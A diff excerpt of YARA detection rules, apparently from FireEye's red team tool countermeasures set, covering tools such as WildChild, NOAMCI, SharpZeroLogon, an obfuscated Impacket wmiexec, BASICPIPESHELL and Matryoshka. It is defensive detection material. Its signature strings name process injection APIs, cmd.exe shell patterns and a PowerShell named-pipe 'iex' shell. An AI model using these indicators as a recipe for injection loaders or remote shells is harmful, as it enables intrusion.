 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_17.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Dropper_HTA_WildChild_1.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "562ecbba043552d59a0f23f61cea0983"
-		logic_hash = "5c20472c3af0c5b8c825671b12763900d6a711695ed04661b33cbf442422348d"
+		hash = "3e61ca5057633459e96897f79970a46d"
+		logic_hash = "60c1d53b8a43b9b7518f3260a4d61c6806641ee894a2a331a3a0a2ea0aff9d99"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 5
 
 	strings:
-		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
-		$s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 }
-		$si1 = "fread" fullword
-		$si2 = "fwrite" fullword
+		$s1 = "processpath" ascii wide
+		$s2 = "v4.0.30319" ascii wide
+		$s3 = "v2.0.50727" ascii wide
+		$s4 = "COMPLUS_Version" ascii wide
+		$s5 = "FromBase64Transform" ascii wide
+		$s6 = "MemoryStream" ascii wide
+		$s7 = "entry_class" ascii wide
+		$s8 = "DynamicInvoke" ascii wide
+		$s9 = "Sendoff" ascii wide
+		$script_header = "<script language=" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$script_header at 0 and all of ( $s* )
 }
-rule FIREEYE_RT_Trojan_Raw_Generic_4 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_WILDCHILD_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "9092f9bb-cab6-55c0-9452-70a6407db93a"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "b9e0707e-98eb-55da-ad1d-6a84bd113747"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Raw_Generic_4.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/APT_Loader_MSIL_WILDCHILD_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f41074be5b423afb02a74bc74222e35d"
-		logic_hash = "8ffd23631c1a9d1abe6695858ec34d61261b3b3f097be94372f3f34e46e7211e"
+		hash = "6f04a93753ae3ae043203437832363c4"
+		logic_hash = "a600c3d127f77dc1f99160e4a242e005970de0abd1798296b6a351b968ca1350"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s0 = { 83 ?? 02 [1-16] 40 [1-16] F3 A4 [1-16] 40 [1-16] E8 [4-32] FF ( D? | 5? | 1? ) }
-		$s1 = { 0F B? [1-16] 4D 5A [1-32] 3C [16-64] 50 45 [8-32] C3 }
+		$s1 = "\x00QueueUserAPC\x00"
+		$s2 = "\x00WriteProcessMemory\x00"
+		$sb1 = { 6F [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 13 ?? 28 [2] 00 0A 28 [2] 00 0A 13 ?? 11 ?? 11 ?? 28 [2] 00 0A [0-16] 7B [2] 00 04 1? 20 [4] 28 [2] 00 0A 11 ?? 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 [0-16] 14 7E [2] 00 0A 7E [2] 00 0A 1? 20 04 00 08 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 [0-16] 7B [2] 00 04 7E [2] 00 0A [0-16] 8E ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 [4-120] 28 [2] 00 06 [0-80] 6F [2] 00 0A 6F [2] 00 0A 28 [2] 00 06 13 ?? 11 ?? 11 ?? 7E [2] 00 0A 28 [2] 00 06 }
 
 	condition:
-		uint16( 0 ) != 0x5A4D and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_Win_Generic_18 : FILE
+rule FIREEYE_RT_Loader_MSIL_Wildchild_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the WildChild project."
 		author = "FireEye"
-		id = "6f44bd64-29bd-50e2-8b61-7ba61bb1f688"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "350dd658-46c9-573b-b532-07e4b437ba8d"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_18.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Loader_MSIL_WildChild_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "c74ebb6c238bbfaefd5b32d2bf7c7fcc"
-		logic_hash = "28c9497f646fcf3daf7007d7afd37971dd85382062c064173f13049ad419fef1"
+		hash = "7e6bc0ed11c2532b2ae7060327457812"
+		logic_hash = "e4320e33770613542182518ec787e4ccbb32f83c8afca5ec957d4846e6f4eb04"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 4
 
 	strings:
-		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
-		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
-		$si1 = "fread" fullword
-		$si2 = "fwrite" fullword
+		$typelibguid1 = "2e71d5ff-ece4-4006-9e98-37bb724a7780" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Trojan_Win_Generic_101 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_NOAMCI_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'noamci' project."
 		author = "FireEye"
-		id = "0290aaea-d65b-5883-97f9-549d107e3e1f"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "48066258-528f-5a70-81e1-15d6dfd9ff4f"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Win_Generic_101.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NOAMCI/production/yara/APT_HackTool_MSIL_NOAMCI_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "2e67c62bd0307c04af469ee8dcb220f2"
-		logic_hash = "e530183f3cab01560b1abc91e2111e5d9e5aadc1c8134027ac07d8917f9419a0"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "6278cfb4e9af20bbe943f4b99227c7fba276315a9f0059575b3ed4ef96a848c4"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		rev = 3
+		rev = 4
 
 	strings:
-		$s0 = { 2A [1-16] 17 [1-16] 02 04 00 00 [1-16] FF 15 }
-		$s1 = { 81 7? [1-3] 02 04 00 00 7? [1-3] 83 7? [1-3] 17 7? [1-3] 83 7? [1-3] 2A 7? }
-		$s2 = { FF 15 [4-16] FF D? [1-16] 3D [1-24] 89 [1-8] E8 [4-16] 89 [1-8] F3 A4 [1-24] E8 }
-		$si1 = "PeekMessageA" fullword
-		$si2 = "PostThreadMessageA" fullword
+		$typelibguid0 = "7bcccf21-7ecd-4fd4-8f77-06d461fd4d51" ascii nocase wide
+		$typelibguid1 = "ef86214e-54de-41c3-b27f-efc61d0accc3" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and @s0 [ 1 ] < @s1 [ 1 ] and @s1 [ 1 ] < @s2 [ 1 ] and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_NOAMCI_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Prepshellcode_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'noamci' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'PrepShellcode' project."
 		author = "FireEye"
-		id = "48066258-528f-5a70-81e1-15d6dfd9ff4f"
+		id = "32fb6b1d-e01f-5555-8516-088dca2166cf"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NOAMCI/production/yara/APT_HackTool_MSIL_NOAMCI_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PREPSHELLCODE/production/yara/HackTool_MSIL_PrepShellcode_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "6278cfb4e9af20bbe943f4b99227c7fba276315a9f0059575b3ed4ef96a848c4"
+		logic_hash = "aedae87d84275f6589c982c04175ddc0aee3e4f3ae959ced4b4e2294675522e6"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$typelibguid0 = "7bcccf21-7ecd-4fd4-8f77-06d461fd4d51" ascii nocase wide
-		$typelibguid1 = "ef86214e-54de-41c3-b27f-efc61d0accc3" ascii nocase wide
+		$typelibguid0 = "d16ed275-70d5-4ae5-8ce7-d249f967616c" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Trojan_Macro_RESUMEPLEASE_1
+rule FIREEYE_RT_Hacktool_MSIL_SHARPZEROLOGON_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'sharpzerologon' project."
 		author = "FireEye"
-		id = "068662f6-28b8-5538-8bc3-6506565305ae"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "51f22eee-fb96-55b0-8c02-1a0e9910a93e"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RESUMEPLEASE/production/yara/Trojan_Macro_RESUMEPLEASE_1.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPZEROLOGON/production/yara/HackTool_MSIL_SHARPZEROLOGON_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "d5d3d23c8573d999f1c48d3e211b1066"
-		logic_hash = "040457bc446e496431129ff4623ddda5d9c2ce339ba65a7fbe42114626f36c60"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "ed6a9bef5c6ee03aff969b8765b284ace517f2e6a1ef114acb04cf094c69cfa5"
 		score = 75
-		quality = 75
-		tags = ""
-		rev = 1
+		quality = 73
+		tags = "FILE"
+		rev = 3
 
 	strings:
-		$str00 = "For Binary As"
-		$str01 = "Range.Text"
-		$str02 = "Environ("
-		$str03 = "CByte("
-		$str04 = ".SpawnInstance_"
-		$str05 = ".Create("
+		$typelibguid0 = "15ce9a3c-4609-4184-87b2-e29fc5e2b770" ascii nocase wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
 rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSACK_1 : FILE
 {
@@ -73394,2641 +73878,2717 @@ rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSACK_1 : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Loader_MSIL_Csharpsectioninjection_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_PXELOOT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'C_Sharp_SectionInjection' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the PXE And Loot project."
 		author = "FireEye"
-		id = "ca5bf5cd-1950-53ed-8984-e880a15e658e"
+		id = "5a72a6ff-bae4-57f5-a19b-a4595ac57293"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSECTIONINJECTION/production/yara/Loader_MSIL_CSharpSectionInjection_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PXELOOT/production/yara/HackTool_MSIL_PXELOOT_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "011cf4dffe6ef90a79cdfabb0e297152c00b0404b1801f56fd7e703ab90b1692"
+		hash = "82e33011ac34adfcced6cddc8ea56a81"
+		logic_hash = "c9892adcb9ff5471235e45988f6662d3b8f984fdafca7024a5781eed50f6c0b3"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 7
 
 	strings:
-		$typelibguid0 = "d77135da-0496-4b5c-9afe-e1590a4c136a" ascii nocase wide
+		$typelibguid1 = "78B2197B-2E56-425A-9585-56EDC2C797D6" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Hacktool_MSIL_Wmisharp_1 : FILE
+rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_2
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMISharp' project."
+		description = "wmiexec"
 		author = "FireEye"
-		id = "97b9d057-30d3-5af7-bac6-4dd53f47650f"
-		date = "2020-12-09"
+		id = "f1059f66-eaff-5866-bafb-c94236cf96a0"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISHARP/production/yara/HackTool_MSIL_WMISharp_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Wmiexec)/production/yara/HackTool_PY_ImpacketObfuscation_2.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "d119d52c1410291d582696d5c4c1de3db9008db963c76a9e344959d869c3acc0"
+		hash = "f3dd8aa567a01098a8a610529d892485"
+		logic_hash = "ccbbe507798f16c7acf0780770fdb81b2e7dc333ab8bc51e6216816276c3f14b"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		rev = 1
+		quality = 50
+		tags = ""
+		rev = 2
 
 	strings:
-		$typelibguid0 = "3a2421d9-c1aa-4fff-ad76-7fcb48ed4bff" ascii nocase wide
+		$s1 = "import random"
+		$s2 = "class WMIEXEC" nocase
+		$s3 = "class RemoteShell" nocase
+		$s4 = /=[\x09\x20]{0,32}str\(int\(time\.time\(\)\)[\x09\x20]{0,32}-[\x09\x20]{0,32}random\.randint\(\d{1,10}[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,10}\)\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}str\(uuid\.uuid4\(\)\)\.split\([\x22\x27]\-[\x22\x27]\)\[0\]/
+		$s5 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]cmd.exe[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_2 : FILE
+rule FIREEYE_RT_APT_Backdoor_PS1_BASICPIPESHELL_1
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/dllmain/"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "5253cb2a-28fd-57ab-be3d-f11cf2ea24cf"
-		date = "2020-11-25"
-		date = "2020-11-25"
-		modified = "2020-12-09"
+		id = "8f85d6cc-fd1e-5bf3-8052-440cbeda0ac9"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BASICPIPESHELL/production/yara/APT_Backdoor_PS1_BASICPIPESHELL_1.yar#L5-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4326a7e863928ffbb5f6bdf63bb9126e"
-		logic_hash = "074f6d9ad78ecd4dd8e3d0b5c8b0f61a48374f3935b85c4222305b207b447ec7"
+		logic_hash = "7a9f0002055ffe826562cab3d02d8babd14c5fcd6d0b528a2988e2649034279d"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		rev = 2
+		quality = 63
+		tags = ""
 
 	strings:
-		$sb1 = { B9 [4] FF 15 [4-32] 8B ?? 1C [0-16] 0F B? ?? 04 [0-64] F3 0F 6F 00 [0-64] 66 0F EF C8 [0-64] F3 0F 7F 08 [0-64] 30 ?? 48 8D 40 01 48 83 ?? 01 7? }
-		$sb2 = { 44 8B ?? 08 [0-32] 41 B8 00 30 00 00 [0-16] FF 15 [4-32] 48 8B C8 [0-16] E8 [4-64] 4D 8D 49 01 [0-32] C1 ?? 04 [0-64] 0F B? [2-16] 41 30 ?? FF 45 3? ?? 7? }
-		$sb3 = { 63 ?? 3C [0-16] 03 [1-32] 0F B? ?? 14 [0-16] 8D ?? 18 [0-16] 03 [1-16] 66 ?? 3B ?? 06 7? [1-64] 48 8D 15 [4-32] FF 15 [4-16] 85 C0 [2-32] 41 0F B? ?? 06 }
+		$s1 = "function Invoke-Client()" ascii nocase wide
+		$s2 = "function Invoke-Server" ascii nocase wide
+		$s3 = "Read-Host 'Enter Command:'" ascii nocase wide
+		$s4 = "new-object System.IO.Pipes.NamedPipeClientStream(" ascii nocase wide
+		$s5 = "new-object System.IO.Pipes.NamedPipeServerStream(" ascii nocase wide
+		$s6 = " = iex $" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		all of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_PGF_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Inmemorycompilation_1 : FILE
 {
 	meta:
-		description = "base.cs"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'In-MemoryCompilation' project."
 		author = "FireEye"
-		id = "39d9821f-86e8-528a-a0a9-287dbe325484"
-		date = "2020-11-24"
-		date = "2020-11-24"
+		id = "80234352-a449-5292-9f0c-beb7a1d39a6c"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MEMCOMP/production/yara/Loader_MSIL_InMemoryCompilation_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a495c6d11ff3f525915345fb762f8047"
-		logic_hash = "4174ed53336f3951d26282dc81b99b2044ac6350d4b4c0074194a9b4acecefee"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "a964a186eb02a2792db01727a31ddaa2414fe9df83cda9b1c9db15d94603303a"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$sb1 = { 72 [4] 6F [2] 00 0A 26 [0-16] 0? 6F [2] 00 0A [1-3] 0? 28 [2] 00 0A [0-1] 0? 72 [4-5] 0? 28 [2] 00 0A [0-1] 0? 6F [2] 00 0A 13 ?? 1? 13 ?? 38 [8-16] 91 [3-6] 8E 6? 5D 91 61 D2 9C 11 ?? 1? 58 13 [3-5] 8E 6? 3F }
+		$typelibguid0 = "524d2687-0042-4f93-b695-5579f3865205" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_PGF_2 : FILE
+rule FIREEYE_RT_APT_Builder_Win64_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "base.js, ./lib/payload/techniques/jscriptdotnet/jscriptdotnet_payload.py"
+		description = "matryoshka_pe_to_shellcode.rs"
 		author = "FireEye"
-		id = "c5f2ec90-cd9b-53ce-893b-e44192fcd507"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "0afcf13e-5cd3-5c1c-897e-b6d0c283ab0f"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_Win64_MATRYOSHKA_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7c2a06ceb29cdb25f24c06f2a8892fba"
-		logic_hash = "b962ea30c063009c0383e25edda3a65202bea4496d0d6228549dcea82bba0d03"
+		hash = "8d949c34def898f0f32544e43117c057"
+		logic_hash = "b370d7dea44bccc92fc8dbd4ea0ee9bec523820108bf8bc67acb17ebf9835f74"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 2? 00 10 00 00 0A 1? 40 0? 72 [4] 0? 0? 28 [2] 00 0A 0? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 0? 74 [2] 00 01 28 [2] 00 0A 6? 0? 0? 28 [2] 00 06 D0 [2] 00 01 28 [2] 00 0A 1? 28 [2] 00 0A 79 [2] 00 01 71 [2] 00 01 13 ?? 0? 1? 11 ?? 0? 74 [2] 00 01 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 13 ?? 1? 13 ?? 7E [2] 00 0A 13 ?? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 1? 11 ?? 11 ?? 1? 11 ?? 28 [2] 00 06 }
-		$ss1 = "\x00CreateThread\x00"
-		$ss2 = "\x00ScriptObjectStackTop\x00"
-		$ss3 = "\x00Microsoft.JScript\x00"
+		$sb1 = { 4D 5A 45 52 [0-32] E8 [0-32] 00 00 00 00 [0-32] 5B 48 83 EB 09 53 48 81 [0-32] C3 [0-32] FF D3 [0-32] C3 }
+		$ss1 = "\x00Stub Size: "
+		$ss2 = "\x00Executable Size: "
+		$ss3 = "\x00[+] Writing out to file"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_5 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_2 : FILE
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/a86b004b5005c0bcdbd48177b5bac7b8"
+		description = "matryoshka.rs"
 		author = "FireEye"
-		id = "376875f3-00f2-58d0-ae22-7f52ea566da2"
-		date = "2020-12-09"
+		id = "25f916bc-6ee1-5175-903c-4266b0a086e1"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_5.yar#L4-L18"
